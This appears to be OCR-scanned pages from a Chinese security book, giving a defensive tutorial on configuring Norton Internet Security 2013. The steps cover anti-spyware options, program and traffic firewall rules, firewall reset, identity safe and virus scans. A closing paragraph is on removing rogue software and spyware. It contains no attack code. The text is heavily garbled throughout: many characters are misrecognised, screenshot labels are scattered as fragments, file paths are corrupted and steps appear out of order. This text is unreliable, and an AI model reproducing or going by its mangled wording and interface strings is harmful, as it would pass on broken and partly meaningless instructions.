击 “ 确 定 ”按钮 即 可 开启 。 

STEP06: 打开 “ 反 间 谍 软 件 ” 窗 口 


反 间 谍 软 件 


安全 风险 类 诈 


跟踪 软件 
民 ] 拨号 程序 
贺 远程 访问 
图 ] 广告 软件 
加 玩笑 程序 
图 ] 安全 评估 工具 
加 误导 应 用 程序 
图 ] 父母 控制 





为 获得 最 大 的 防护 ， 最 好 勾 选 所 有 选项 。 
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FE 


EA 
请 
靳 个人 人 他 


STEP07: 切换 至 “网 络 " 选 项 卡 





入侵 防护 
4 。 自 定义 入 侵 设置 


| ”消息 保护 
外 定义 和 保护 电子 起 件 


网 络 安全 设置 
受 保 护 的 网 络 系统 


和 A= 智能 防火 墙 
4 策 。 防火 墙 保护 设置 


使 用 部 分 默认 值 


全 部 上 默认 确定 取消 


国 对 网 络 中 各 项 国 单 击 “智能 防火 墙 ” 区 域 的 
防护 进行 设置 。 ” “程序 规则 ”选项 。 


STEP09: 打开 “选择 应 用 程序 ”对 话 框 


360 
360move_SogoulInput_1 
95599 Certificate Tools 
ACD Systems 

Adobe 

alipay 

Baidu 

Common Files 

DVD Maker 

EVEREST 

feiq 

| Pp 





| 可 执行 文件 (*exe) 





选择 要 添加 的 程序 ， 单 击 “ 打 开 ” 按 钮 。 


STEP11: 打开 “修改 规则 ”对 话 框 


修改 规则 


是 阻止 、 人 允许 还 是 监控 新 连接 ? 
全 允许 :允许 与 此 规则 匹配 人 连接 。 
阻止 :不 允许 与 此 规则 匹配 的 连接 . 
监控 :记录 与 该 规则 匹配 的 连接 这 使 您 能 笋 监控 该 规则 的 使 用 次 数 ， 











根据 提示 信息 修改 规则 ， 修 改 完成 后 单 击 “确定 ” 
按钮 。 
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STEP08: ”打开 “程序 规则 ”对 话 框 


程序 规则 


为 每 个 程序 创建 自 定 义 internet 访问 。 





CloudSys Application 
安装 \Rising\RawCloudSys.exe 








Internet Explorer 
Chprogram Files\Internet Explorer\Vexplore.exe 








QQ2013 
Ci\Program Files\Tencent\QQ\Bin\QQ,exe 


























国 可 修改 每 个 程序 的 
Internet 访问 方式 。 


单 击 “ 添 加 ”按钮 
添加 其 他 程序 控制 。 


STEP10: 打开 “规则 ”对 话 框 


这 些 规则 可 确定 防火 墙 如 何 通过 360 下 载 答 理 
( D:\360\360Safe\LiveUpdate360.exe ) 处 理 连 接 岩 试 。 列表 中 越 靠 前 的 规则 优先 级 越 高 。 


360 下 载 管理 
加 易 吕 区 允许 , 方向 : 入 站 /出 站 , 电脑 : 任何 , 通信 : 任何 协议 : 全 部 





贺 选中 需要 修改 的 
程序 。 


STEP12: 


单 击 “ 修 改 ” 
按钮 。 


返回 规则” 对话 框 


这 些 规则 可 确定 防火 墙 如何 通过 360 下 载 管理 
(D: 360\300 rel eupdate360, eXe ) 处 理 连 控 尝 试 。 列 过 中 越 告 前 的 规则 优先 级 越 高 。 


360 下 载 管理 
回 易 ? 兄 允许 , 方向 : 入 站 /出 站 , 电脑 : 任何 , 通信: 任何, 协议 : 全 部 





如 果 要 删除 某 程序 控制 ， 选 择 需要 
后 ， 单 击 “ 删 除 ” 按 钮 。 


删 除 的 程序 之 
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STEP13: 确认 信息 STEP14: 打开 “网 络 ” 选 项 卡 


入 侵 防护 智能 防火 墙 
让 定义 入 侵 设置 高 级 设置 
程序 规则 
消息 保护 信任 控制 
语 定 义 和 保 护 电 子 邮 件 阳 上 所 有 网 阁 通 信 


规则 


是 否 要 删除 规则 “360 下 载 管理 ”? 


网 络 安全 设置 
受 保 护 的 网 络 系统 


了 Norton 


防火 境 保 护 设置 





单 击 “ 是 ”按钮 ， 即 完成 删除 操作 。 





单 击 “智能 防火 墙 ” 中 的 “高 级 设置 ” 右 侧 的 “ 配 
置 ”链接 。 
STEP15: 打开 “高 级 设置 ”对 话 框 STEP16: 打开 “通信 规则 ”对 话 框 


高 级 设置 通信 规则 


这 些 规 则 确定 防火 墙 如 何 处 理 您 的 包 蘑 上 所 有 程序 的 连接 。 列 表 中 位 置 想 靠 前 的 规则 优先 级 起 高 。 
说 明 
默认 人 允许 符 定 入 站 ICMP 
允许 , 方向 : 入 站 , 电脑 : 任何 , 还 信 : 特定 , 协议 : ICMP 
于 认 爷 许 不 可 这 到 入 站 ICMP 目标 
允许, 方向 : 入 站 , 电脑: 任何 , 通信 : 特定 , 协议 ; ICMP 
默认 允许 符 定 当 站 ICMP 
允许 , 方向 : 出 站 , 电脑 : 任何 , 通信 : 特定 , 协议 : ICMP 
自动 文件 /打印 机 共享 控制 J 2 默认 人 允许 入 站 NetBIOS (共享 网 络 ) 
自动 程序 控制 = [+] 局 3 一 允许 , 方向 : 入 站 , 电脑: 本 地 子 网 , 通信 : 特定 , 协议 : UDP 
默认 阳 止 入 站 NetBIOS 
阻止 , 方向 : 入 站 , 电脑 : 任何 , 透 信 : 特定 , 协议 ; UDP 
默认 允许 入 站 NetBIOS 名 称 (共享 网 洛 ) 
允许, 方向: 入 站 , 电脑 : 本 地 子 网 , 通信 : 特定 , 协议 : UDP 











加 激活 高 级 防护 功能 ， 自 国 单 击 “通信 规则 ”可 以 对 规则 进行 添加 、 修 改 、 删 除 、 上 移 和 下 移 操 
定义 计算 机 用 于 查看 网 页 ” 右 侧 “配置 ”链接 。 ” 作 。 

的 端口 。 

STEP17: 返回 “高 级 设置 ”对 话 框 STEP18: 打开 “防火 墙 重 置 ” 信 息 提示 框 


Norton Internet Security Online 


通信 规则 

非常 用 协议 

防火 堵 盏 置 

隐 滥 阻止 的 端口 

状态 协议 过 泪 器 

自动 文件 /打印 机 共享 控制 


0 人 任 控制 设置 )。 如 要 重 
' 防火 培 梅 被 暂时 莹 用 几 种 钟 


自动 程序 控制 


是 富 要 继续 ? 





如 果 要 对 防火 墙 进行 重新 设置 ， 单 击 " 防 火 墙 重 置 ” 单 击 “是 ”按钮 ， 即 可 重新 设置 整个 防火 墙 设 置 。 
右 侧 的 “ 重 置 ”链接 。 
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ST Pe > 





攻防 从 入 门 到 精通 





义 
新 
本 今 公 人 位 
STEP19: 和 返回 “设置 ”对 话 框 STEP20: 设置 Norton 身份 安全 


Norton ldentity Safe 


浏览 器 主动 防护 
各 定 义 浏览 器 设置 


创建 帐户 


”下 载 智 能 分 析 
自 定义 下 载 设置 


身份 安全 
保护 身份 、 密 码 | | 
输入 电子 邮件 地 址 以 登录 到 您 的 席 祯 帐户 或 创建 

| 安全 上 网 一 个 新 帐户 . 
自 定 义 冲浪 设置 


ju 





Verm 六 





在 “网 页 ”选项 卡 中 单 击 “身份 安全 ” 右 侧 的 “ 配 ”对 Norton 身 份 进 行 安全 设置 。 
置 ”链接 。 


STEP21: 切换 至 “常规 ”选项 卡 


着 默 模式 
全 屏 检 测 


ER 进行 诺顿 任务 、 性 能 监控 和 产品 安全 性 的 设置 。 


媒体 中 心 TV 录制 
用 户 指定 程序 


MA 取消 Ee 





2. 用 网 络 安全 特警 扫描 程序 
设置 完毕 之后， 就 可 以 运用 设置 好 的 方式 实施 扫 摘 程序， 具体 的 操作 步骤 如 下 。 


STEP01: 运行 “诺顿 网 络 安全 特警 2013” STEP02: 选择 扫描 方式 








Norton Internet Security Norton Internet Security 


电脑 扫描 快速 扫描 、 全 面 系统 扫描 ， 自 定义 扫描 


扫 挤 易 受 感染 的 区 域 ， 扫 摘 整 台电 脑 或 对 张 动 器 、 文 件 夹 或 磁盘 进行 自 定义 扫 挤 ， 


修复 工具 ， 





单 击 “ 立 即 扫描 ”按钮 。 根据 实际 需要 选择 扫描 方式 。 
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STEP03: 进行 快速 扫描 STEP04: 查看 处 理 结果 


快速 扫描 人 快速 扫描 二 有 


正在 扫描 易 受 感染 区 域 和 启动 文件 .… 
WPCSVC 4 
结果 摘要 威胁 已 检测 到 
= 


国 已 扫 摘 的 项 目 总 数 : 标题 

2 个 跟 尝 Cookie 已 寺 全 敌 决 ， 
司 检测 到 的 安全 风险 总 数 : ca 
国 已 解决 的 安全 风险 总 数 : 


需要 注 章 的 安全 风险 总 数 : 


已 阿 高 删除 的 文件 。 要 还 原 这 些 文件 ， 闭 击 此 处 , 
如 果 您 认为 仍 存 在 风险 ， 单 去 此 处 。 














VY Norton 





显示 扫描 信息 。 系统 自动 对 威胁 进行 处 理 ， 可 查看 结果 摘要 并 可 导 
出 扫描 结果 ， 操 作 完 成 后 单 击 “完成 ”按钮 。 


其 实 , 不 论 是 流氓 软件 还 是 间谍 软件 ， 都 存在 噩 度 危害 计算 机 系统 的 安全 性 和 稳定 性 ， 
非常 有 必要 将 其 清除 。 由 于 不 同 的 间谍 软件 和 流氓 软件 设置 各 不 相同 ， 且 防 删 除 的 方法 也 
越 来 越 复 傈 ， 因 此 即使 利用 反 间 诬 软 件 或 反 流氓 软件 ， 也 不 能 保证 将 其 成 功 清除 ， 有 时 还 
可 能 会 因为 清除 流氓 软件 和 间 诬 软件 而 导 华 系统 出 现 问 题 ， 此 时 就 需要 请 教 专家 进行 手动 
消除。 读者 只 有 学 会 了 流氓 软件 与 间 诬 软件 的 清除 方法 ， 才 能 充分 你 证 目 己 的 计算 机 系统 
不 家 恶意 软件 破坏 ， 以 减少 黑客 入 侵 市 来 的 损失 。 
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